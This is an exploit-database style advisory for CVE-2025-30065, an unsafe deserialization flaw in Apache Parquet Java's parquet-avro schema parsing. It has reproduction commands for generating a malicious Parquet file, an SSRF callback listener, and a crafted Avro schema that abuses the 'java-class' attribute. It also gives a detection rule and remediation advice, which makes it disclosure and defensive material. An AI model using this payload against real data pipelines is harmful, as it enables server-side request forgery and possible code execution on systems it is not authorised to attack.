Apache Parquet Java Unsafe Deserialization RCE (CVE-2025-30065)

by mouadk · 2026-05-16

CVSS: 10.0/10
Severity: Critical
CVE: CVE-2025-30065
Category: misc
Affected product: Apache Parquet Java (parquet-avro) schema parsing consumers
Affected versions: Vulnerable parquet-avro releases impacted by CVE-2025-30065 (source PoC demonstrates 1.8.1)
Disclosed: 2026-05-16
Patch status: unpatched

Metadata

Date Added: 2026-05-16
Author / Researcher: mouadk
CVE / Advisory: CVE-2025-30065
Category: misc
Severity: Critical
CVSS Score: 10.0 (CVSSv3)
Status: Weaponized
Tags: RCE, unsafe-deserialization, parquet-avro, avro-schema, Java, JVM, SSRF, data-pipeline
Related: N/A

Affected Target

Software / System: Apache Parquet Java (parquet-avro) schema parsing consumers
Versions Affected: Vulnerable parquet-avro releases impacted by CVE-2025-30065 (source PoC demonstrates 1.8.1)
Language / Platform: Java 17+, JVM-based data processing pipelines
Authentication Required: No (if attacker can feed crafted Parquet data into ingestion path)
Network Access Required: Yes

Summary

CVE-2025-30065 is an unsafe deserialization issue in Apache Parquet Java schema handling that can instantiate attacker-controlled classes while parsing malicious Parquet/Avro metadata. The provided PoC demonstrates two practical outcomes: arbitrary command execution when a gadget/class is present on the classpath, and SSRF by forcing JVM-side network requests through class instantiation. The attack surface is broad because many analytics and ETL ecosystems parse Parquet data automatically.


Vulnerability Details

Root Cause

parquet-avro schema parsing trusts attacker-influenced schema attributes such as java-class, allowing reflective class loading/instantiation during record materialization. This creates a deserialization-like gadget path from data input to code execution side effects.

Attack Vector

An attacker delivers a crafted Parquet file into a vulnerable ingestion workflow (batch upload, object store ingestion, pipeline import, etc.). When the victim service reads the file with vulnerable Parquet Java libraries, malicious schema metadata triggers dangerous object construction.

Impact

Successful exploitation can trigger SSRF and, with suitable classpath gadgets or reachable constructors, remote code execution in the JVM context of the data pipeline service. In enterprise environments this can lead to lateral movement, secret access, or full processing-node compromise.


Environment / Lab Setup

OS:          Linux/macOS attacker and victim lab hosts
Target:      Java application using vulnerable parquet-avro builds (source PoC demonstrates 1.8.1)
Attacker:    Any host that can provide malicious Parquet input
Tools:       Java 17, Maven, Python (for HTTP callback listener)

Setup Steps

git clone https://github.com/mouadk/parquet-rce-poc-CVE-2025-30065
cd parquet-rce-poc-CVE-2025-30065

mvn -q clean package

Proof of Concept

Step-by-Step Reproduction

  1. Generate malicious Parquet (RCE-oriented class instantiation path).

     mvn -q exec:java -Dexec.mainClass=com.evil.GenerateMaliciousParquet

  2. Trigger vulnerable read path.

     mvn -q exec:java -Dexec.mainClass=com.victim.Reader

  3. Run SSRF variant (more realistic attacker outcome).

     python3 -m http.server 8000
     mvn -q exec:java -Dexec.mainClass=com.evil.GenerateMaliciousParquetSSRF
     mvn -q exec:java -Dexec.mainClass=com.victim.ReaderSSRF

Exploit Code

See copied source files in this folder:

  • src/main/java/com/evil/GenerateMaliciousParquet.java
  • src/main/java/com/evil/GenerateMaliciousParquetSSRF.java
  • src/main/java/com/evil/RCEPayload.java
  • src/main/java/com/victim/Reader.java
  • src/main/java/com/victim/ReaderSSRF.java
String schemaSSRF = """
{
  "type": "record",
  "name": "MaliciousRecord",
  "fields": [{
    "name": "evil",
    "type": {
      "type": "string",
      "java-class": "javax.swing.JEditorPane"
    }
  }]
}
""";

Expected Output

CVE-2025-30065 Poc: malicious parquet generated->exploit.parquet
CVE-2025-30065 Poc: malicious parquet generated->exploit-ssrf.parquet

Screenshots / Evidence

  • screenshots/01_rce_payload_execution.png — command-execution PoC output flow
  • screenshots/02_ssrf_callback_evidence.png — SSRF callback evidence from victim JVM

Detection & Indicators of Compromise

SIEM / IDS Rule (example):

alert http $DATA_PLATFORM any -> any any (
  msg:"Possible CVE-2025-30065 SSRF callback from Parquet processing node";
  flow:to_server,established;
  content:"User-Agent|3a| Java";
  sid:9525030065; rev:1;
)

Remediation

Patch: Upgrade Apache Parquet Java to a release that fixes CVE-2025-30065 per official advisory
Workaround: Reject untrusted Parquet files and disable/limit schema-driven dynamic class behaviors where possible
Config Hardening: Isolate pipeline runtimes, constrain egress, and monitor classloading/network activity during ingestion

References


Notes

Auto-ingested from https://github.com/mouadk/parquet-rce-poc-CVE-2025-30065 on 2026-05-16. For repository safety, the archived pom.xml pins patched dependency versions (parquet-avro 1.15.2, avro 1.11.4).

exploit.html
<!-- DISCLAIMER: For authorized security research only. -->
<!DOCTYPE html><html><body><h1>CVE-2025-30065 Exploit Executed </h1></body></html>